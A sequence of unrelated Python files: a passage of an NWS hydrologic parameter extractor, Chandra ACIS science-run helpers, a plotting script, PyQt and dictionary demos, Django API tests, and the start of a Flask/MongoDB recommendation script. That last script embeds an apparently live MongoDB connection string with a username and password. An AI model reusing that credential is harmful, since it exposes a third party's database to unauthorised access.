'') s1,s2 = line.split(',') AREA.append(s2) ELEV.append(s1) output_file.write(line + '\n') if len(AREA) > 0: fig, ax1 = plt.subplots() #Plot the data ax1.plot(ELEV, AREA, color='black', label='AEC', linewidth='2', zorder=5) ax1.plot(ELEV, AREA, 'o', color='black', ms=8, zorder=5, alpha=0.75) #ax1.fill_between(x, AREA,facecolor='gray', alpha=0.25) #ax1.minorticks_on() ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3) ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3) majorLocator = MultipleLocator(.10) ax1.yaxis.set_major_locator(majorLocator) ax1.xaxis.set_minor_locator(AutoMinorLocator(2)) ax1.set_xlabel('Elevation') ax1.set_ylabel('Area (% Below)') ax1.set_ylim([-0.05,1.05]) #add plot legend with location and size ax1.legend(loc='upper left', prop={'size':10}) plt.title(name + ' Area Elevation Curve') figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\AEC_plots\\' + name + '_AEC.png' plt.savefig(figname, dpi=100) plt.clf() plt.close() #Turn interactive plot mode off (don't show figures) plt.ioff() txt_file.close() output_file.close() #Delete temporary .txt file holding .xml contents os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt') os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt') csv_file.write('\n') csv_file.close() ############################################################################################################################################################### #UNIT HG SECTION--------------------------------------------------------------- #loop through UNITHG .xlm files in folderPath if uh == 'on': print 'Processing UH parameters...' csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_UHG_Params_' + param_source + '.csv', 'w') csv_file.write('BASIN, AREA (mi2), Interval (hours),') t = 0 while t < 600: csv_file.write(str(t) + ',') t += 6 csv_file.write('\n') for filename in glob.glob(os.path.join(folderPath, "UNITHG*.xml")): #print filename #Define output file name name = str(os.path.basename(filename)[:]) name = name.replace('UNITHG_', '') name = name.replace('_UpdateStates.xml', '') #print name csv_file.write(name + ',') #Open .xml file and temporary .txt file to write .xml contents to xml_file = open(filename, 'r') txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w') #Write contents of .xml file to the temporary .txt file for line in xml_file: txt_file.write(line) #Close the open files xml_file.close() txt_file.close() #Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r') output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt', 'w') #Write data headers output_file.write('PARAMETER,VALUE' + '\n') ###UHG_DURATION #Find line number with UHG_DURATION value #Line number is saved when loop breaks line_num = 0 for line in txt_file: line_num += 1 if 'UHG_DURATION' in line: break #Set cursor back to beginning of txt_file that is being read txt_file.seek(0) #Section/line of .txt file with desired parameter value section = txt_file.readlines()[line_num:line_num+1] for line in section: #Write only numbers and decimals to output file line = re.sub("[^0123456789\.\-]", "", line) output_file.write('UHG_DURATION,' + line + '\n') ###DRAINAGE_AREA txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'DRAINAGE_AREA' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) area = line csv_file.write(area + ',') output_file.write('DRAINAGE_AREA,' + line + '\n') ###UHG_INTERVAL txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'UHG_INTERVAL' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) interval = line csv_file.write(interval + ',') output_file.write('UHG_INTERVAL,' + line + '\n') ###CONSTANT_BASE_FLOW txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'CONSTANT_BASE_FLOW' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) #const_bf = line #csv_file.write(const_bf + ',') output_file.write('CONSTANT_BASE_FLOW,' + line + '\n') ###UHG_ORDINATES output_file.write ('\n' + 'UHG_ORDINATES' + '\n') output_file.write('0,0' + '\n') txt_file.seek(0) UHG_time = [] UHG_flow = [] #Set time 0 values ordinate = 0 flow = 0 csv_file.write('0' + ',') UHG_time.append(ordinate) UHG_flow.append(ordinate) for line in txt_file: if 'row A' in line: ordinate = ordinate + 6 UHG_time.append(ordinate) line = re.sub("[^0123456789\.\-]", "", line) line_float = float(line) csv_file.write(line + ',') UHG_flow.append(line_float) output_file.write(str(ordinate) + ',' + line + '\n') #Get max UHG time value max_time = numpy.max(UHG_time) x = range(0,max_time+6,6) if uh_plots == 'on': fig, ax1 = plt.subplots() #Plot the data ax1.plot(UHG_time, UHG_flow, color='black', label='UHG', linewidth='2', zorder=5) ax1.plot(UHG_time, UHG_flow, 'o', color='black', ms=4, zorder=5, alpha=0.75) ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25) #ax1.minorticks_on() ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3) ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3) majorLocator = MultipleLocator(6) ax1.xaxis.set_major_locator(majorLocator) ax1.yaxis.set_minor_locator(AutoMinorLocator(2)) ax1.set_xlabel('Time (hr)') ax1.set_ylabel('Flow (cfs)') #Make tick labels smaller/rotate for long UHGs if max_time >= 100: for label in ax1.xaxis.get_ticklabels(): label.set_fontsize(8) if max_time >= 160: for label in ax1.xaxis.get_ticklabels(): label.set_fontsize(6) plt.xticks(rotation=90) majorLocator = MultipleLocator(12) ax1.xaxis.set_major_locator(majorLocator) ax1.set_xlim([0,max_time+3]) plt.ylim(ymin=0) #add plot legend with location and size ax1.legend(loc='upper right', prop={'size':10}) plt.title(name + ' UHG / ' + 'Area (mi2) = ' + area) figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\UHG_plots\\' + name + '_UHG.png' plt.savefig(figname, dpi=100) plt.clf() plt.close() #Turn interactive plot mode off (don't show figures) plt.ioff() txt_file.close() output_file.close() csv_file.write('\n') #Delete temporary .txt file holding .xml contents os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt') os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt') csv_file.close() ############################################################################################################################################################### #LAG-K SECTION--------------------------------------------------------------- #loop through Lag-K .xlm files in folderPath if lag_k == 'on': print 'Processing LAG-K parameters...' csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_LAGK_Params_' + param_source + '.csv', 'w') csv_file.write('BASIN,Current Outflow,Current Storage,JK,JLAG,LAG1,Q1,LAG2,Q2,LAG3,Q3,LAG4,Q4,LAG5,Q5,LAG6,Q6,LAG7,Q7,LAG8,Q8,LAG9,Q9,LAG10,Q10,LAG11,Q11,LAG12,Q12,LAG13,Q13,LAG14,Q14,K1,KQ1,K2,KQ2,K3,KQ3,K4,KQ4,K5,KQ5,K6,KQ6,K7,KQ7,K8,KQ8,K9,KQ9,K10,KQ10,K11,KQ11,K12,KQ12,K13,KQ13,K14,KQ14'+'\n') basin_count = 0 for filename in glob.glob(os.path.join(folderPath, "LAGK*.xml")): #print filename lag_time = [] lag_Q = [] K_time = [] K_Q = [] #Define output file name name = str(os.path.basename(filename)[:]) name = name.replace('LAGK_', '') name = name.replace('_UpdateStates.xml', '') #print name csv_file.write(name + ',') #Open .xml file and temporary .txt file to write .xml contents to xml_file = open(filename, 'r') txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w') #Write contents of .xml file to the temporary .txt file for line in xml_file: txt_file.write(line) #Close the open files xml_file.close() txt_file.close() #Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r') output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt', 'w') ### CURRENT_OUTFLOW #Find line number with CURRENT_OUTFLOW value #Line number is saved when loop breaks line_num = 0 check = 'na' for line in txt_file: line_num += 1 if 'CURRENT_OUTFLOW' in line: check = 'go' break #Set cursor back to beginning of txt_file that is being read txt_file.seek(0) #Section/line of .txt file with desired parameter value section = txt_file.readlines()[line_num:line_num+1] if check != 'go': csv_file.write('na,') output_file.write('CURRENT_OUTFLOW,' + 'na' + '\n') else: for line in section: #Write only numbers and decimals to output file line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('CURRENT_OUTFLOW,' + line + '\n') ### CURRENT_STORAGE txt_file.seek(0) line_num = 0 check = 'na' for line in txt_file: line_num += 1 if 'CURRENT_STORAGE' in line: check = 'go' break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] if check != 'go': csv_file.write('na,') output_file.write('CURRENT_STORAGE,' + 'na' + '\n') else: for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('CURRENT_STORAGE,' + line + '\n') ### Inflow Basin txt_file.seek(0) line_num = 0 check = 'na' for line in txt_file: line_num += 1 if 'TSIDA' in line: check = 'go' break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] if check == 'go': for line in section: inflow_basin = line[19:-15] basin_count += 1 ### JK txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'id="JK"' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+2] for line in section: if '<!--' not in line: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('JK,' + line + '\n') jk = int(line) break ### JLAG txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'id="JLAG"' in line: break txt_file.seek(0) section = txt_file.readlines()[line_num:line_num+1] for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('JLAG,' + line + '\n') jlag = int(line) ### LAGQ txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'LAGQ_PAIRS' in line: break txt_file.seek(0) if jlag == 0: end_line = 3 else: end_line = (jlag * 2)+2 section = txt_file.readlines()[line_num+2:line_num+end_line] count = 0 for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('LAGQ_PAIRS,' + line + '\n') if count % 2 ==0: lag_time.append(float(line)) else: lag_Q.append(float(line)) count += 1 #print lag_time #print lag_Q if jlag == 0: jlag = 1 csv_file.write('0' + ',') while jlag < 14: csv_file.write('' + ',' + '' + ',') jlag += 1 ### KQ txt_file.seek(0) line_num = 0 for line in txt_file: line_num += 1 if 'KQ_PAIRS' in line: break txt_file.seek(0) end_line = (jk * 2)+3 txt_file.seek(0) if jk == 0: end_line = 3 else: end_line = (jk * 2)+2 section = txt_file.readlines()[line_num+2:line_num+end_line] count = 0 for line in section: line = re.sub("[^0123456789\.\-]", "", line) csv_file.write(line + ',') output_file.write('KQ_PAIRS,' + line + '\n') if count % 2 ==0: K_time.append(float(line)) else: K_Q.append(float(line)) count += 1 #print K_time #print K_Q if jk == 0: jk = 1 csv_file.write('0' + ',') while jk < 14: csv_file.write('' + ',' + '' + ',') jk += 1 txt_file.close() output_file.close() csv_file.write('\n') #Get max Lag/K time value max_time = numpy.max(lag_time + K_time) x = range(0,int(max_time)+6,6) if lag_plots == 'on' and len(K_time)>1 and len(lag_time)>1: fig, ax1 = plt.subplots() #Plot the data ax1.plot(lag_time, lag_Q, 'g-o', label='LAG', linewidth='2', zorder=5, ms=5) ax1.plot(K_time, K_Q, 'r-o', label='K', linewidth='2', zorder=5, ms=5) #ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25) #ax1.minorticks_on() ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3) ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3) majorLocator = MultipleLocator(6) ax1.xaxis.set_major_locator(majorLocator) ax1.yaxis.set_minor_locator(AutoMinorLocator(2)) ax1.set_xlabel('Time (hr)') ax1.set_ylabel('Flow (cfs)') #Make tick labels smaller/rotate for long UHGs if max_time >= 100: for label in ax1.xaxis.get_ticklabels(): label.set_fontsize(8) if max_time >= 160: for label in ax1.xaxis.get_ticklabels(): label.set_fontsize(6) plt.xticks(rotation=90) majorLocator = MultipleLocator(12) ax1.xaxis.set_major_locator(majorLocator) ax1.set_xlim([0,max_time+3]) plt.ylim(ymin=0) #add plot legend with location and size ax1.legend(loc='upper right', prop={'size':10}) plt.title(name[:5] + ': ' + inflow_basin + ' LAG/K Parameters') figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\LAGK_plots\\' + name + '_lagk.png' plt.savefig(figname, dpi=100) plt.clf() plt.close() #Delete temporary .txt file holding .xml contents os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt') os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt') print 'Total LAG/K files extacted: ' + str(basin_count) csv_file.close() ################################################################################################################################### print 'Script Complete' print str(datetime.now())
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python ################################################################################# # # # acis_sci_run_functions.py: collection of functions used by acis sci run # # # # author: t. isobe (tisobe@cfa.harvard.edu) # # # # last update: Feb 26, 2021 # # # ################################################################################# import os import sys import re import string import random import time import Chandra.Time path = '/data/mta/Script/ACIS/Acis_sci_run/house_keeping/dir_list_py_t' f = open(path, 'r') data = [line.strip() for line in f.readlines()] f.close() for ent in data: atemp = re.split(':', ent) var = atemp[1].strip() line = atemp[0].strip() exec("%s = %s" %(var, line)) # #--- append a path to a private folder to python directory # sys.path.append(bin_dir) sys.path.append(mta_dir) # #--- converTimeFormat contains MTA time conversion routines # import mta_common_functions as mcf # #--- temp writing file name # rtail = int(time.time() * random.random()) zspace = '/tmp/zspace' + str(rtail) http_dir = 'https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/' # #--- NOTE: #--- because we need to run test, web_dir read from dir_list_py cannot be used. instead #--- we are passing from the main script's web_dir to local html_dir variable. (Apr 26, 2013) # #----------------------------------------------------------------------------------------------- #--- removeDuplicated: remove duplicated entries --- #----------------------------------------------------------------------------------------------- def removeDuplicated(ifile): """ remove duplicated rows from the file Input: file --- a file name of the data Output: file --- cleaned up data """ data = mcf.read_data_file(ifile) if len(data) > 0: first = data.pop(0) new = [first] for ent in data: chk = 0 for comp in new: if ent == comp: chk = 1 break if chk == 0: new.append(ent) # #--- now print out the cleaned up data # with open(ifile, 'w') as f: for ent in new: line = ent + '\n' f.write(line) #----------------------------------------------------------------------------------------------- #--- acis_sci_run_print_html: update html pages -- #----------------------------------------------------------------------------------------------- def acis_sci_run_print_html(html_dir, pyear, pmonth, pday): """ update three html pages according for the year (pyear) Input: html_dir --- web directory path pyear --- the year you want to update the html pages pmonth --- current month pday --- current month date Output: science_run.html science_run<year>.html """ # #--- set substitution values # pyear = int(pyear) cpmon = mcf.add_leading_zero(int(float(pmonth))) cpday = mcf.add_leading_zero(int(float(pday))) update = str(pyear) + '-' + str(cpmon) + '-' + str(cpday) ydate = int(float(time.strftime("%j", time.strptime(update, '%Y-%m-%d')))) # #--- make a link table # ylist = '' j = 0 for ryear in range(1999, pyear+1): ylist = ylist + '<td><a href=' + http_dir + '/Year' + str(ryear) ylist = ylist + '/science_run' + str(ryear) + '.html>' ylist = ylist + '<strong>Year ' + str(ryear) + '</strong></a><br /><td />\n' # #--- every 6 years, break a row # if j == 5: j = 0 ylist = ylist + '</tr><tr>\n' else: j += 1 # #---- update the main html page # template = house_keeping + 'science_run.html' outfile = html_dir + 'science_run.html' print_html_page(template, update, pyear, ylist, outfile) # #--- update sub directory html pages # ystop = pyear + 1 for syear in range(1999, ystop): template = house_keeping + 'sub_year.html' outfile = html_dir + 'Year' + str(syear) + '/science_run' + str(syear) + '.html' if syear == pyear: ldate = update else: ldate = str(syear) + '-12-31' print_html_page(template, ldate, syear, ylist, outfile) #----------------------------------------------------------------------------------------------- #-- print_html_page: read template and update the html page -- #----------------------------------------------------------------------------------------------- def print_html_page(template, update, syear, ylist, outfile): """ read template and update the html page input: template --- the template file name update --- udated date syeare --- year ylist --- html table containing links to sub directories outfile --- html file name output: outfile """ f = open(template, 'r') hfile = f.read() f.close() temp0 = hfile.replace('#UPDATE#', update) temp1 = temp0.replace('#YEAR#', str(syear)) temp2 = temp1.replace('#YLIST#', str(ylist)) with open(outfile, 'w') as f: f.write(temp2) #----------------------------------------------------------------------------------------------- #--- checkEvent: check high event/error/drop cases, and send out a warning message if needed --- #----------------------------------------------------------------------------------------------- def checkEvent(html_dir, etype, event, year, criteria, dname): """ check high event/error/drop cases, and send out a warning message if needed input: html_dir --- web directory path etype --- type of error e.g. drop for Te3_3 event --- event name e.g. Te3_3 criteria --- cut off e.g. 3.0 for Te3_3 dname --- table name e.g. drop rate(%) output: ofile --- updated with newly found violation """ # #----- read the main table and file new entries # ifile = html_dir + 'Year' + str(year) + '/' + event + '_out' cdata = mcf.read_data_file(ifile) # #----- check data type: drop rate, high error, and high event # mchk = re.search('drop', etype) mchk2 = re.search('error', etype) new_list = [] sline = '' for ent in cdata: atemp = re.split('\s+', ent) # #--- if the case is "drop" rate, the pass the data as it is # if mchk is not None: try: cval = float(atemp[9]) #--- drop rate except: continue # #--- otherwise normalize the data # else: cval = 0 try: val6 = float(atemp[6]) if val6 > 0: if mchk2 is not None: cval = float(atemp[8])/val6 #--- high error else: cval = float(atemp[7])/val6 #--- high count except: continue # #--- here is the selection criteria # if cval > criteria: cval = round(cval, 3) # #--- limit length of description to 20 letters # alen = len(atemp[11]) if alen < 20: dline = atemp[11] for i in range(alen, 20): dline = dline + ' ' else: dline = '' for i in range(0, 20): dline = dline + atemp[11][i] # #--- some foramtting adjustments # if len(atemp[0]) < 4: sp = '\t\t' else: sp = '\t' if len(atemp[1]) < 12: sp2 = '\t\t\t' else: sp2 = '\t\t' tlen = len(atemp[6]) lval = atemp[6] for k in range(tlen,4): lval = ' ' + lval line = atemp[0] + sp + dline + '\t' + atemp[1] + sp2 line = line + lval + '\t' + atemp[2] + '\t' + atemp[3] + '\t\t' line = line + atemp[10] + '\t' + str(cval) + '\n' sline = sline + line new_list.append(line) # #--- print out the table # aline = 'obsid target start time int time inst ' aline = aline + 'ccd grat ' + dname + '\n' aline = aline + '-------------------------------------------------------------' aline = aline + '----------------------------------------------\n' aline = aline + sline ofile = web_dir + 'Year' + str(year) + '/'+ etype + '_' + str(year) with open(ofile, 'w') as fo: fo.write(aline) return new_list #----------------------------------------------------------------------------------------------- #-- updateLongTermTable: update a long term violation tables --- #----------------------------------------------------------------------------------------------- def updateLongTermTable(html_dir, event, this_year, dname): """ updates long term violation tables Input: html_dir --- web directory path events --- name of events such as drop (te3_3) this_year --- the latest year dname --- column name to use Output: violation table file named "event" """ line = '' ytop = int(this_year) + 1 for year in range(1999, ytop): #line = line + '\nYear' + str(year) + '\n' fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_' + str(year) data = mcf.read_data_file(fname) for ent in data: atemp = re.split('\s+', ent) try: val = float(atemp[0]) otime = atemp[2] ntime = str(year) + ':' + otime ent = ent.replace(otime, ntime) line = line + ent + '\n' except: pass # #--- write out the talbe # hline = 'obsid target start time int time inst ccd grat ' + dname + '\n' hline = hline + '-----------------------------------------------------------------------------------------------------------\n' line = hline + line oname = html_dir + 'Long_term/' + event.lower() with open(oname, 'w') as fo: fo.write(line) #----------------------------------------------------------------------------------------------- #-- updateLongTermTable2: update long term sub data tables --- #----------------------------------------------------------------------------------------------- def updateLongTermTable2(html_dir, event, this_year): """ update long term sub data tables Input: html_dir web directory path event name of the event such as te3_3 this_year the latest year Output: sub data file suchas te3_3_out """ line = '' ytop = int(this_year) + 1 for year in range(1999, ytop): # #--- check leap year # if mcf.is_leapyear(year): base = 366.0 else: base = 365.0 # #--- read each year's data # fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_out' data = mcf.read_data_file(fname) if len(data) == 0: continue for ent in data: atemp = re.split('\t+|\s+', ent) try: val = float(atemp[0]) btemp = re.split(':', atemp[1]) # #--- convert time to year date to fractional year # time = float(year) + (float(btemp[0]) + float(btemp[1])/ 86400.0 ) / base time = round(time, 3) dlen = len(atemp) dlst = dlen -1 for j in range(0, dlen): if j == 1: line = line + str(time) + '\t' elif j == dlst: line = line + atemp[j] + '\n' else: line = line + atemp[j] + '\t' except: pass oname = html_dir + 'Long_term/' + event.lower() + '_out' with open(oname, 'w') as fo: fo.write(line) #----------------------------------------------------------------------------------------------- #-- chkNewHigh: sending out email to warn that there are value violatioins ---- #----------------------------------------------------------------------------------------------- def chkNewHigh(old_list, new_list, event, dname): """ sending out email to warn that there are value violatioins Input: old_list: old violation table new_list: new violation table event: event name dname: column name to be used """ wchk = 0 # #--- compare old and new list and if there are new entries, save them in "alart" # alart = [] for ent in new_list: chk = 0 ntemp = re.split('\t+|\s+', ent) for comp in old_list: otemp = re.split('\t+|\s+', comp) if(ent == comp) or (ntemp[0] == otemp[0]): chk = 1 break if chk == 0: alart.append(ent) wchk += 1 # #--- if there is violations, send out email # if wchk > 0: line = 'ACIS Science Run issued the following warning(s)\n\n' line = line + "The following observation has a " + event + "Rate in today's science run\n\n" line = line + 'obsid target start time int time ' line = line + 'inst ccd grat ' + dname + '\n' line = line + '------------------------------------------------------------' line = line + '-------------------------------------------\n' for ent in alart: line = line + ent + '\n' line = line + '\nPlese check: https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/' line = line + 'science_run.html\n' line = line + '\n or MIT ACIS Site: https://acisweb.mit.edu/asc/\n' with open(zspace, 'w') as f: f.wirte(line) cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>' cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu' # cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>' # cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu ' # cmd = cmd + swolk\@head.cfa.harvard.edu acisdude\@head.cfa.harvard.edu"' os.system(cmd) mcf.rm_files(zspace) #----------------------------------------------------------------------------------------------- #-- convert_to_chandra_time: convert time into Chandra Time -- #----------------------------------------------------------------------------------------------- def convert_to_chandra_time(dtime, ifmt='%Y:%m:%d:%H:%M:%S'): """ convert time into Chandra Time input: dtime --- original time in ifmt ifmt --- time format output: stime --- seconds from 1998.1.1 """ out = time.strftime("%Y:%j:%H:%M:%S", time.strptime(dtime, ifmt)) stime = int(Chandra.Time.DateTime(out).secs) return stime
#!/usr/bin/env python3 -u # Run python with -u to flush output directly import sys import argparse import numpy as np import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument("file", help="file path to analyze") parser.add_argument("--no-inputs", help="no display inputs", action="store_true") parser.add_argument("--no-targets", help="no display targets", action="store_true") parser.add_argument("-n", "--number", help="max number of inputs and targets displayed", type=int, default=0) args = parser.parse_args() path = args.file print "Loading ", args.file file = open(path, "r") input_data = [] target_data = [] l = 0 inputs_nb = 0 inputs_target = 0 for line in file: error = False splitted = line.split(":") if len(splitted) != 2: continue raw_inputs = splitted[0].split() raw_targets = splitted[1].split() inputs = [] targets = [] for i in range(len(raw_inputs)): try: inputs.append( float(raw_inputs[i].strip("\\;")) ) except ValueError: error = True break for i in range(len(raw_targets)): try: targets.append( float(raw_targets[i].strip("\\;")) ) except ValueError: error = True break if error: continue input_data.append(inputs) target_data.append(targets) print "Done with loaded data (size=" + str(len(input_data)) + ")" subplots = 0 if args.no_inputs is False: input_data = np.matrix(input_data).transpose() input_mean = np.mean(input_data, axis=1).getA1() input_data_size = input_data.shape[0] subplots += min(args.number, input_data_size) if args.number != 0 else input_data_size if args.no_targets is False: target_data = np.matrix(target_data).transpose() target_mean = np.mean(target_data, axis=1).getA1() target_data_size = target_data.shape[0] subplots += min(args.number, target_data_size) if args.number != 0 else target_data_size print "Done with matrix operations. Shape is " + str(input_data_size) + ":" + str(target_data_size) ######## DISPLAY n = 0 sax = plt.subplot(subplots, 1, 1) if args.no_inputs is False: for i in range(input_data_size): n += 1 ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax) data = input_data[i].getA1() plt.plot(data) plt.plot([0, len(data)], [input_mean[i], input_mean[i]], "g") ax.set_xlim(0, len(data)) # ax.set_ylim(-1.1, 1.1) if args.number != 0 and i >= min(args.number, input_data_size)-1: break if args.no_targets is False: for i in range(target_data_size): n += 1 ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax) data = target_data[i].getA1() plt.plot(data, "r") plt.plot([0, len(data)], [target_mean[i], target_mean[i]], "g") ax.set_xlim(0, len(data)) ax.set_ylim(-1.1, 1.1) if args.number != 0 and i >= min(args.number, target_data_size)-1: break plt.show() ######## END DISPLAY
from PyQt4.QtGui import * class MyDialog(QDialog): def __init__(self): QDialog.__init__(self) ed = QLineEdit() ed.setText("홍길동") #텍스트 쓰기 text = ed.text() #텍스트 읽기 # # Watermark로 텍스트 표시 # ed.setPlaceholderText("이름을 입력하시오") # # 텍스트 모두 선택 # ed.selectAll() # 에디트는 읽기 전용으로 ed.setReadOnly(True) # # # Password 스타일 에디트 # ed.setEchoMode(QLineEdit.Password) # Layout layout = QVBoxLayout() layout.addWidget(ed) # Set layout on a MyDialog self.setLayout(layout) # app app = QApplication([]) dialog = MyDialog() dialog.show() app.exec_()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Mar 23 11:04:54 2020 @author: ctralie A basic example of dictionaries """ import numpy as np import pickle chris = { 'year':'supersenior', 'major':'ee', 'brand':'acer', 'grades':{ 'audio':95, 'image':60, 'nbody':100 }, 10: [-1, 5, 2, 4] } chris['favassignment'] = 'fractal' del chris['grades'] keys = list(chris.keys()) values = list(chris.values()) for myvar in chris.keys(): print(myvar, " value is ", chris[myvar])
""" api/tests.py """ from django.test import TestCase from django.urls import reverse from rest_framework import status from rest_framework.test import APIClient from .models import Shoppinglist # Create your tests here. class ModelTestCases(TestCase): """ Test cases for models """ def setUp(self): """ Define test variables """ self.shoppinglist = Shoppinglist( name="Christmass shopping", description="Shopping for 2018 christmass") def test_shoppinglist_model(self): """ Test Shoppinglist model is created """ old_count = Shoppinglist.objects.count() self.shoppinglist.save() new_count = Shoppinglist.objects.count() self.assertNotEqual(old_count, new_count) class ViewTestCases(TestCase): """ Test cases for views """ def setUp(self): """ Define test client """ self.client = APIClient() self.shoppinglist_data = { "name": "Easter shopping", "description": " Shopping to gift mum this easter."} self.response = self.client.post( reverse('api:create_list'), self.shoppinglist_data, format="json") # get shoppinglist from model self.shoppinglist = Shoppinglist.objects.get() def test_shoppinglist_is_created(self): """ test api can create a shoppinglist """ self.assertEqual(self.response.status_code, status.HTTP_201_CREATED) def test_api_can_get_single_shoppinglist(self): """ test api can get one shoppinglist """ response = self.client.get( reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}), format="json") self.assertContains(response, self.shoppinglist) def test_api_can_edit_shoppinglist(self): """ test api can get edit a shoppinglist """ new_shoppinglist_data = { "name": "Christmass shopping", "description": " Christmass gift 2018."} response = self.client.put( reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}), new_shoppinglist_data, format="json" ) self.assertEqual(response.status_code, status.HTTP_200_OK) def test_api_can_delete_shoppinglist(self): """ test api can get delete a shoppinglist """ response = self.client.delete( reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}), format="json" ) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
from flask import Flask, render_template, request import tensorflow as tf import pandas as pd import numpy as np import matplotlib.pyplot as plt from bson.objectid import ObjectId from pymongo import MongoClient, cursor from tensorflow import keras from tensorflow.keras import layers ,callbacks client = MongoClient('mongodb+srv://recommendation-yradx:vOghBXFE9ReZo40k@develop.r2hgr.mongodb.net/recommendation?authSource=admin&replicaSet=atlas-siynys-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true') db=client['recommendation-ldprod'] #db=client.recommendation """**DATA 01 : BOOKMARKS**""" res1 = db.op_bookmarks.find() dat1 = pd.DataFrame(list(res1)) dat1.rename(columns = {'_id' : 'id_bookmark'} , inplace=True) dat1.rename(columns = {'user' : 'id_user'} , inplace=True) dat1.rename(columns = {'text' : 'id_text'} , inplace=True) dat1=dat1.drop(['id_bookmark','updatedAt','createdAt','__v'], axis=1) if not (dat1.id_text.empty): dat1.insert(2, "Event1", "Bookmark", allow_duplicates=True) else : dat1['Event1'] == "NaN" dat1=dat1.drop_duplicates() """**DATA 02: READS**""" res2 = db.rc_reads.find() dat2 = pd.DataFrame(list(res2)) dat2.rename(columns = {'_id' : 'id_read'} , inplace=True) dat2.rename(columns = {'user' : 'id_user'} , inplace=True) dat2.rename(columns = {'text' : 'id_text'} , inplace=True) dat2=dat2.drop(['id_read','updatedAt','createdAt','__v' ], axis=1) dat2['roles'] = [str(a) for a in dat2['roles']] dat2['roles']=dat2['roles'].str.strip('[' ']') 